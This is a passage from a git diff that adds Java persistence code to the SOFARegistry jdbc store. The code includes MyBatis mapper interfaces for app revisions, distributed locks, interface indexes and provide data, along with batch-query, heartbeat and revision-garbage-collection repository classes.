WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.mapper; + +import com.alipay.sofa.registry.jdbc.domain.AppRevisionDomain; +import java.util.Date; +import java.util.List; +import org.apache.ibatis.annotations.Param; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionMapper.java, v 0.1 2021年01月18日 17:49 xiaojian.xj Exp $ + */ +public interface AppRevisionMapper { + + /** + * save record + * + * @param appRevision + * @return effect record count + */ + public int insert(AppRevisionDomain appRevision); + + /** + * query revision + * + * @param dataCenter + * @param revision + * @return + */ + public AppRevisionDomain queryRevision( + @Param("dataCenter") String dataCenter, @Param("revision") String revision); + + /** + * batch query + * + * @param revisions + * @return + */ + public List batchQuery( + @Param("dataCenter") String dataCenter, @Param("revisions") List revisions); + + /** + * check if revision exist + * + * @param dataCenter + * @return revision + */ + AppRevisionDomain checkExist( + @Param("dataCenter") String dataCenter, @Param("revision") String revision); + + /** + * batchHeartbeat + * + * @param dataCenter + * @param revisions + */ + void batchHeartbeat( + @Param("dataCenter") String dataCenter, @Param("revisions") List revisions); + + /** + * query app_revision silence beyond silenceHour + * + * @param dataCenter + * @param date + * @return + */ + public List queryGcRevision( + @Param("dataCenter") String dataCenter, + @Param("date") Date date, + @Param("limitCount") int limitCount); + + /** + * delete + * + * @param dataCenter + * @param revision + */ + public void deleteAppRevision( + @Param("dataCenter") String dataCenter, @Param("revision") String revision); + + /** + * @param revisions + * @return + */ + List batchCheck( + @Param("dataCenter") String dataCenter, @Param("revisions") List revisions); +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/DistributeLockMapper.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/DistributeLockMapper.java new file mode 100644 index 000000000..51ab98ad5 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/DistributeLockMapper.java @@ -0,0 +1,59 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.mapper; + +import com.alipay.sofa.registry.jdbc.domain.DistributeLockDomain; +import com.alipay.sofa.registry.jdbc.domain.FollowCompeteLockDomain; +import org.apache.ibatis.annotations.Param; + +/** + * @author xiaojian.xj + * @version $Id: DistributeLockMapper.java, v 0.1 2021年03月12日 10:51 xiaojian.xj Exp $ + */ +public interface DistributeLockMapper { + + /** + * query by dataCenter and lockName + * + * @param dataCenter + * @param lockName + * @return + */ + public DistributeLockDomain queryDistLock( + @Param("dataCenter") String dataCenter, @Param("lockName") String lockName); + + /** + * compete lock, it will throw exception if lockName existed + * + * @param lock + */ + public void competeLockOnInsert(DistributeLockDomain lock) throws Exception; + + /** + * compete lock with cas + * + * @param competeLock + * @return + */ + public void competeLockOnUpdate(FollowCompeteLockDomain competeLock); + + /** renew lock last update time */ + public void ownerHeartbeat(DistributeLockDomain lock); + + /** force reset owner and duration */ + public void forceRefresh(DistributeLockDomain lock); +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/InterfaceAppsIndexMapper.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/InterfaceAppsIndexMapper.java new file mode 100644 index 000000000..bdaf21734 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/InterfaceAppsIndexMapper.java @@ -0,0 +1,78 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.mapper; + +import com.alipay.sofa.registry.jdbc.domain.InterfaceAppsIndexDomain; +import java.util.List; +import org.apache.ibatis.annotations.Param; + +/** + * @author xiaojian.xj + * @version $Id: InterfaceAppsIndexMapper.java, v 0.1 2021年01月24日 17:04 xiaojian.xj Exp $ + */ +public interface InterfaceAppsIndexMapper { + + /** + * query by interfaceName + * + * @param dataCenter + * @param interfaceName + * @return + */ + public List queryByInterfaceName( + @Param("dataCenter") String dataCenter, @Param("interfaceName") String interfaceName); + + /** + * batch query by interfaceName + * + * @param dataCenter + * @param interfaceNames + * @return + */ + public List batchQueryByInterface( + @Param("dataCenter") String dataCenter, @Param("interfaceNames") List interfaceNames); + + /** + * insert on replace + * + * @param domain + * @return + */ + int insertOnReplace(InterfaceAppsIndexDomain domain); + + /** + * insert + * + * @param domain + * @return effect rows number + */ + public int update(InterfaceAppsIndexDomain domain); + + /** + * query domains which gmt_modified is after than maxUpdate + * + * @param dataCenter + * @param maxId + * @returns + */ + List queryLargeThan( + @Param("dataCenter") String dataCenter, + @Param("maxId") long maxId, + @Param("limitCount") int limitCount); + + int getTotalCount(@Param("dataCenter") String dataCenter); +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/ProvideDataMapper.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/ProvideDataMapper.java new file mode 100644 index 000000000..80dbc244b --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/mapper/ProvideDataMapper.java @@ -0,0 +1,77 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.mapper; + +import com.alipay.sofa.registry.jdbc.domain.ProvideDataDomain; +import java.util.List; +import org.apache.ibatis.annotations.Param; + +/** + * @author xiaojian.xj + * @version $Id: ProvideDataMapper.java, v 0.1 2021年03月12日 11:05 xiaojian.xj Exp $ + */ +public interface ProvideDataMapper { + + /** + * insert or update provideData + * + * @param data + */ + public int save(ProvideDataDomain data); + + /** + * insert or update provideData + * + * @param data + */ + public int update( + @Param("data") ProvideDataDomain data, @Param("exceptVersion") long exceptVersion); + + /** query provideData */ + public ProvideDataDomain query( + @Param("dataCenter") String dataCenter, @Param("dataKey") String dataKey); + + /** + * remove provideData + * + * @param dataCenter + * @param dataKey + */ + public int remove( + @Param("dataCenter") String dataCenter, + @Param("dataKey") String dataKey, + @Param("dataVersion") long dataVersion); + + /** + * query by page + * + * @param dataCenter + * @param start + * @param limit + * @return + */ + List queryByPage( + @Param("dataCenter") String dataCenter, @Param("start") int start, @Param("limit") int limit); + + /** + * query total count + * + * @param dataCenter + * @return + */ + int selectTotalCount(@Param("dataCenter") String dataCenter); +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/AppRevisionBatchQueryCallable.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/AppRevisionBatchQueryCallable.java new file mode 100644 index 000000000..1b0e4b21c --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/AppRevisionBatchQueryCallable.java @@ -0,0 +1,90 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.batch; + +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.convertor.AppRevisionDomainConvertor; +import com.alipay.sofa.registry.jdbc.domain.AppRevisionDomain; +import com.alipay.sofa.registry.jdbc.mapper.AppRevisionMapper; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.BatchCallableRunnable; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.concurrent.TimeUnit; +import java.util.stream.Collectors; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionBatchQueryCallable.java, v 0.1 2021年01月24日 14:01 xiaojian.xj Exp $ + */ +public class AppRevisionBatchQueryCallable extends BatchCallableRunnable { + + private static final Logger LOG = + LoggerFactory.getLogger("METADATA-EXCHANGE", "[AppRevisionBatchQuery]"); + + @Autowired private AppRevisionMapper appRevisionMapper; + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + public AppRevisionBatchQueryCallable() { + super(100, TimeUnit.MILLISECONDS, 200); + } + /** + * batch query app_revision + * + * @param taskEvents + * @return + */ + @Override + public boolean batchProcess(List taskEvents) { + + if (CollectionUtils.isEmpty(taskEvents)) { + return true; + } + if (LOG.isInfoEnabled()) { + LOG.info("commit app_revision query, task size: " + taskEvents.size()); + } + List revisions = + taskEvents.stream().map(task -> task.getData()).collect(Collectors.toList()); + List domains = + appRevisionMapper.batchQuery(defaultCommonConfig.getClusterId(), revisions); + + Map queryResult = new HashMap<>(); + domains.forEach( + domain -> { + AppRevision appRevision = queryResult.get(domain.getRevision()); + if (appRevision != null) { + return; + } + queryResult.putIfAbsent( + domain.getRevision(), AppRevisionDomainConvertor.convert2Revision(domain)); + }); + + taskEvents.forEach( + taskEvent -> { + String revision = taskEvent.getData(); + InvokeFuture future = taskEvent.getFuture(); + future.putResponse(queryResult.get(revision)); + }); + return true; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/AppRevisionHeartbeatBatchCallable.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/AppRevisionHeartbeatBatchCallable.java new file mode 100644 index 000000000..62b24e1f9 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/AppRevisionHeartbeatBatchCallable.java @@ -0,0 +1,74 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.batch; + +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.mapper.AppRevisionMapper; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.BatchCallableRunnable; +import java.util.List; +import java.util.concurrent.TimeUnit; +import java.util.stream.Collectors; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionHeartbeatBatchCallable.java, v 0.1 2021年02月09日 17:52 xiaojian.xj Exp $ + */ +public class AppRevisionHeartbeatBatchCallable extends BatchCallableRunnable { + + private static final Logger LOG = + LoggerFactory.getLogger("METADATA-EXCHANGE", "[AppRevisionHeartbeatBatch]"); + + @Autowired private AppRevisionMapper appRevisionMapper; + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + public AppRevisionHeartbeatBatchCallable() { + super(100, TimeUnit.MILLISECONDS, 200); + } + /** + * batch update gmt_modified + * + * @param tasks + * @return + */ + @Override + public boolean batchProcess(List tasks) { + + if (CollectionUtils.isEmpty(tasks)) { + return true; + } + if (LOG.isInfoEnabled()) { + LOG.info("update app_revision gmt_modified, task size: " + tasks.size()); + } + List revisions = + tasks.stream().map(task -> task.getData()).collect(Collectors.toList()); + //更新appRevision + appRevisionMapper.batchHeartbeat(defaultCommonConfig.getClusterId(), revisions); + //放回并通知等待线程 + tasks.forEach( + taskEvent -> { + InvokeFuture future = taskEvent.getFuture(); + future.putResponse(taskEvent.getData()); + }); + + return true; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/InterfaceAppBatchQueryCallable.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/InterfaceAppBatchQueryCallable.java new file mode 100644 index 000000000..f92f971d3 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/batch/InterfaceAppBatchQueryCallable.java @@ -0,0 +1,106 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.batch; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.domain.InterfaceAppsIndexDomain; +import com.alipay.sofa.registry.jdbc.mapper.InterfaceAppsIndexMapper; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.BatchCallableRunnable; +import com.alipay.sofa.registry.util.TimestampUtil; +import com.google.common.collect.Sets; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.concurrent.TimeUnit; +import java.util.stream.Collectors; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +/** + * @author xiaojian.xj + * @version $Id: InterfaceAppBatchQueryCallable.java, v 0.1 2021年01月26日 14:45 xiaojian.xj Exp $ + */ +public class InterfaceAppBatchQueryCallable + extends BatchCallableRunnable { + + private static final Logger LOG = + LoggerFactory.getLogger("METADATA-EXCHANGE", "[InterfaceAppBatchQuery]"); + + @Autowired private InterfaceAppsIndexMapper interfaceAppsIndexMapper; + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + public InterfaceAppBatchQueryCallable() { + super(100, TimeUnit.MILLISECONDS, 200); + } + + @Override + public boolean batchProcess(List taskEvents) { + + if (CollectionUtils.isEmpty(taskEvents)) { + return true; + } + if (LOG.isInfoEnabled()) { + LOG.info("commit interface_apps_index interface query, task size: " + taskEvents.size()); + } + List interfaceNames = + taskEvents.stream().map(task -> task.getData()).collect(Collectors.toList()); + List domains = + interfaceAppsIndexMapper.batchQueryByInterface( + defaultCommonConfig.getClusterId(), interfaceNames); + + Map> indexResult = new HashMap<>(); + Map versionResult = new HashMap<>(); + domains.forEach( + domain -> { + indexResult + .computeIfAbsent(domain.getInterfaceName(), k -> Sets.newConcurrentHashSet()) + .add(domain.getAppName()); + + Long v1 = versionResult.get(domain.getInterfaceName()); + long v2 = TimestampUtil.getNanosLong(domain.getGmtCreate()); + if (v1 == null || v2 > v1) { + versionResult.put(domain.getInterfaceName(), v2); + } else { + LOG.error( + "[IgnoreUpdateCache]ignored query index, interfac={}, currentVersion={}, newVersion={}", + domain.getInterfaceName(), + v1, + v2); + } + }); + + taskEvents.forEach( + taskEvent -> { + String interfaceName = taskEvent.getData(); + InvokeFuture future = taskEvent.getFuture(); + Set appNames = indexResult.get(interfaceName); + Long version = versionResult.get(interfaceName); + + if (appNames == null || version == null) { + future.putResponse(new InterfaceMapping(-1)); + } else { + future.putResponse(new InterfaceMapping(version, appNames)); + } + }); + return true; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionHeartbeatJdbcRepository.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionHeartbeatJdbcRepository.java new file mode 100644 index 000000000..8ff9a03d0 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionHeartbeatJdbcRepository.java @@ -0,0 +1,166 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.impl; + +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.config.MetadataConfig; +import com.alipay.sofa.registry.jdbc.mapper.AppRevisionMapper; +import com.alipay.sofa.registry.jdbc.repository.batch.AppRevisionHeartbeatBatchCallable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.repository.AppRevisionHeartbeatRepository; +import com.alipay.sofa.registry.util.BatchCallableRunnable.InvokeFuture; +import com.alipay.sofa.registry.util.BatchCallableRunnable.TaskEvent; +import com.alipay.sofa.registry.util.MathUtils; +import com.alipay.sofa.registry.util.SingleFlight; +import com.google.common.collect.Sets; +import com.google.common.collect.Sets.SetView; +import java.util.ArrayList; +import java.util.Date; +import java.util.HashMap; +import java.util.HashSet; +import java.util.List; +import java.util.Map; +import java.util.Map.Entry; +import java.util.Set; +import java.util.concurrent.ConcurrentHashMap; +import javax.annotation.PostConstruct; +import javax.annotation.Resource; +import org.apache.commons.lang.time.DateUtils; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionHeartbeatJdbcRepository.java, v 0.1 2021年02月09日 17:14 xiaojian.xj Exp $ + */ +public class AppRevisionHeartbeatJdbcRepository implements AppRevisionHeartbeatRepository { + + private static final Logger LOG = + LoggerFactory.getLogger("METADATA-EXCHANGE", "[AppRevisionHeartbeat]"); + + @Resource private AppRevisionJdbcRepository appRevisionJdbcRepository; + + @Autowired private AppRevisionMapper appRevisionMapper; + + @Autowired private AppRevisionHeartbeatBatchCallable appRevisionHeartbeatBatchCallable; + + @Autowired private MetadataConfig metadataConfig; + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + private SingleFlight singleFlight = new SingleFlight(); + + private Integer REVISION_GC_LIMIT; + + private static final Integer heartbeatCheckerSize = 1000; + + @PostConstruct + public void postConstruct() { + REVISION_GC_LIMIT = metadataConfig.getRevisionGcLimit(); + } + + @Override + public void doAppRevisionHeartbeat() { + + try { + singleFlight.execute( + "app_revision_heartbeat", + () -> { + Map futureMap = new HashMap<>(); + + Set heartbeatSet = + appRevisionJdbcRepository + .getHeartbeatSet() + .getAndSet(new ConcurrentHashMap<>().newKeySet()); + for (String revision : heartbeatSet) { + TaskEvent taskEvent = appRevisionHeartbeatBatchCallable.new TaskEvent(revision); + InvokeFuture future = appRevisionHeartbeatBatchCallable.commit(taskEvent); + futureMap.put(revision, future); + } + + for (Entry entry : futureMap.entrySet()) { + + InvokeFuture future = entry.getValue(); + try { + future.getResponse(); + } catch (InterruptedException e) { + LOG.error("app_revision: {} heartbeat error.", entry.getKey(), e); + } + } + return null; + }); + } catch (Exception e) { + LOG.error("app_revision heartbeat error.", e); + } + } + + @Override + public void doHeartbeatCacheChecker() { + try { + + Set heartbeatSet = appRevisionJdbcRepository.getHeartbeatSet().get(); + List revisions = new ArrayList(heartbeatSet); + + List exists = new ArrayList<>(); + int round = MathUtils.divideCeil(revisions.size(), heartbeatCheckerSize); + for (int i = 0; i < round; i++) { + int start = i * heartbeatCheckerSize; + int end = + start + heartbeatCheckerSize < revisions.size() + ? start + heartbeatCheckerSize + : revisions.size(); + List subRevisions = revisions.subList(start, end); + exists.addAll( + appRevisionMapper.batchCheck(defaultCommonConfig.getClusterId(), subRevisions)); + } + + SetView difference = Sets.difference(new HashSet<>(revisions), new HashSet<>(exists)); + LOG.info("[doHeartbeatCacheChecker] reduces heartbeat size: {}", difference.size()); + appRevisionJdbcRepository.invalidateHeartbeat(difference); + + } catch (Exception e) { + LOG.error("app_revision heartbeat cache checker error.", e); + } + } + + @Override + public void doAppRevisionGc(int silenceHour) { + + try { + singleFlight.execute( + "app_revision_gc", + () -> { + Date date = DateUtils.addHours(new Date(), -silenceHour); + List revisions = + appRevisionMapper.queryGcRevision( + defaultCommonConfig.getClusterId(), date, REVISION_GC_LIMIT); + + if (LOG.isInfoEnabled()) { + LOG.info("app_revision tobe gc size: {}, revisions: {}", revisions.size(), revisions); + } + for (String revision : revisions) { + // delete app_revision + appRevisionMapper.deleteAppRevision(defaultCommonConfig.getClusterId(), revision); + } + + return null; + }); + } catch (Exception e) { + LOG.error("app_revision gc error.", e); + } + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionJdbcRepository.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionJdbcRepository.java new file mode 100644 index 000000000..b1ff9fa6a --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionJdbcRepository.java @@ -0,0 +1,195 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.impl; + +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.convertor.AppRevisionDomainConvertor; +import com.alipay.sofa.registry.jdbc.domain.AppRevisionDomain; +import com.alipay.sofa.registry.jdbc.exception.AppRevisionQueryException; +import com.alipay.sofa.registry.jdbc.exception.RevisionNotExistException; +import com.alipay.sofa.registry.jdbc.mapper.AppRevisionMapper; +import com.alipay.sofa.registry.jdbc.repository.batch.AppRevisionBatchQueryCallable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.repository.AppRevisionRepository; +import com.alipay.sofa.registry.util.BatchCallableRunnable.InvokeFuture; +import com.alipay.sofa.registry.util.BatchCallableRunnable.TaskEvent; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.cache.CacheBuilder; +import com.google.common.cache.CacheLoader; +import com.google.common.cache.LoadingCache; +import java.util.Collection; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.ExecutionException; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.atomic.AtomicReference; +import javax.annotation.Resource; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionJdbcRepository.java, v 0.1 2021年01月17日 15:45 xiaojian.xj Exp $ + */ +public class AppRevisionJdbcRepository implements AppRevisionRepository { + + private static final Logger LOG = LoggerFactory.getLogger("METADATA-EXCHANGE", "[AppRevision]"); + + /** map: */ + private final LoadingCache registry; + + /** map: */ + private final AtomicReference heartbeatSet = + new AtomicReference<>(); + + @Autowired private AppRevisionMapper appRevisionMapper; + + @Autowired private AppRevisionBatchQueryCallable appRevisionBatchQueryCallable; + + @Resource private InterfaceAppsJdbcRepository interfaceAppsJdbcRepository; + + @Autowired private DefaultCommonConfig defaultCommonConfig; + + public AppRevisionJdbcRepository() { + this.registry = + CacheBuilder.newBuilder() + .maximumSize(10000L) + .expireAfterAccess(60, TimeUnit.MINUTES) + .build( + new CacheLoader() { + @Override + public AppRevision load(String revision) throws InterruptedException { + + TaskEvent task = appRevisionBatchQueryCallable.new TaskEvent(revision); + InvokeFuture future = appRevisionBatchQueryCallable.commit(task); + + if (future.isSuccess()) { + Object response = future.getResponse(); + if (response == null) { + throw new RevisionNotExistException(revision); + } + AppRevision appRevision = (AppRevision) response; + return appRevision; + } else { + throw new AppRevisionQueryException(revision, future.getMessage()); + } + } + }); + + heartbeatSet.set(new ConcurrentHashMap<>().newKeySet()); + } + + @Override + public void register(AppRevision appRevision) throws Exception { + if (appRevision == null) { + throw new RuntimeException("jdbc register app revision error, appRevision is null."); + } + + // query database + try { + AppRevisionDomain revision = + appRevisionMapper.checkExist( + defaultCommonConfig.getClusterId(), appRevision.getRevision()); + if (revision != null) { + return; + } + } catch (Throwable e) { + LOG.error("new revision:{} register error.", appRevision.getRevision(), e); + throw e; + } + + // new revision, save into database + + // it will ignore ON DUPLICATE KEY, return effect rows number + interfaceAppsJdbcRepository.batchSave( + appRevision.getAppName(), appRevision.getInterfaceMap().keySet()); + + // it will ignore ON DUPLICATE KEY + appRevisionMapper.insert( + AppRevisionDomainConvertor.convert2Domain(defaultCommonConfig.getClusterId(), appRevision)); + } + + @Override + public void refresh() { + + try { + interfaceAppsJdbcRepository.refresh(defaultCommonConfig.getClusterId()); + } catch (Throwable e) { + LOG.error("jdbc refresh revisions failed ", e); + throw new RuntimeException("jdbc refresh revision failed", e); + } + } + + @Override + public AppRevision queryRevision(String revision) { + + try { + return registry.get(revision); + } catch (ExecutionException e) { + if (e.getCause() instanceof RevisionNotExistException) { + LOG.info("jdbc query revision failed, revision: {} not exist in db", revision, e); + return null; + } + + LOG.error("jdbc query revision error, revision: {}", revision, e); + throw new RuntimeException("jdbc refresh revision failed", e); + } + } + + @Override + public boolean heartbeat(String revision) { + + try { + if (heartbeatSet.get().contains(revision)) { + return true; + } + AppRevisionDomain domain = + appRevisionMapper.checkExist(defaultCommonConfig.getClusterId(), revision); + + if (domain != null) { + heartbeatSet.get().add(revision); + return true; + } + return false; + } catch (Throwable e) { + LOG.error("jdbc revision heartbeat failed, revision: %{}", revision, e); + return false; + } + } + + /** + * Getter method for property heartbeatMap. + * + * @return property value of heartbeatMap + */ + public AtomicReference getHeartbeatSet() { + + return heartbeatSet; + } + + public void invalidateHeartbeat(Collection keys) { + if (LOG.isInfoEnabled()) { + LOG.info("Invalidating heartbeat cache keys: {}", keys); + } + heartbeatSet.get().removeAll(keys); + } + + @VisibleForTesting + LoadingCache getRevisions() { + return registry; + } +} diff --git a/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/InterfaceAppsJdbcRepository.java b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/InterfaceAppsJdbcRepository.java new file mode 100644 index 000000000..bf929a061 --- /dev/null +++ b/server/store/jdbc/src/main/java/com/alipay/sofa/registry/jdbc/repository/impl/InterfaceAppsJdbcRepository.java @@ -0,0 +1,236 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.impl; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.config.MetadataConfig; +import com.alipay.sofa.registry.jdbc.domain.InterfaceAppsIndexDomain; +import com.alipay.sofa.registry.jdbc.exception.InterfaceAppQueryException; +import com.alipay.sofa.registry.jdbc.mapper.InterfaceAppsIndexMapper; +import com.alipay.sofa.registry.jdbc.repository.batch.InterfaceAppBatchQueryCallable; +import com.alipay.sofa.registry.log.Logger; +import 